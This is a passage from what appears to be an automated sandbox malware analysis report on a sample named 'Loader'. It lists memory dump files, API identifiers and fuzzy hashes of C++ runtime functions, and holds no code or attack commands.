                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                              • String ID: %
                                                                                              • API String ID: 3761405300-3997664075
                                                                                              • Opcode ID: 2be9847ea0c3f86af9803ea0ef7228269afe6e20e664a0a9ed3dc9bce4ed6d91
                                                                                              • Instruction ID: fc50e9954eb51d8ad65d0f050025cfcb89cd2619569e43d8f9cf136a2f00e96d
                                                                                              • Opcode Fuzzy Hash: 2be9847ea0c3f86af9803ea0ef7228269afe6e20e664a0a9ed3dc9bce4ed6d91
                                                                                              • Instruction Fuzzy Hash: 5521CFB5540205DED710CF17F956B547BA8BB48314F20606EE60DEB3A1E3B2A8C8CF45
                                                                                              APIs
                                                                                                • Part of subcall function 00E64533: __EH_prolog3_GS.LIBCMT ref: 00E6453A
                                                                                              • std::domain_error::domain_error.LIBCPMT ref: 00E645EC
                                                                                                • Part of subcall function 00E643A4: std::exception::exception.LIBCONCRT ref: 00E643BA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_std::domain_error::domain_errorstd::exception::exception
                                                                                              • String ID: CD$CD
                                                                                              • API String ID: 2144476180-4090438138
                                                                                              • Opcode ID: 691273bde47a5f920dd2c4224f17b09ce66307caea4a5611b42621727080a112
                                                                                              • Instruction ID: 3a15ae023be90ec834df06274781fb463d2b6bac0c405ef2ae4273b571795b98
                                                                                              • Opcode Fuzzy Hash: 691273bde47a5f920dd2c4224f17b09ce66307caea4a5611b42621727080a112
                                                                                              • Instruction Fuzzy Hash: DC015EB0D002189FCF18EF69D8418AEBBF9FF48344B50941EE815A7340DB34DA45CB90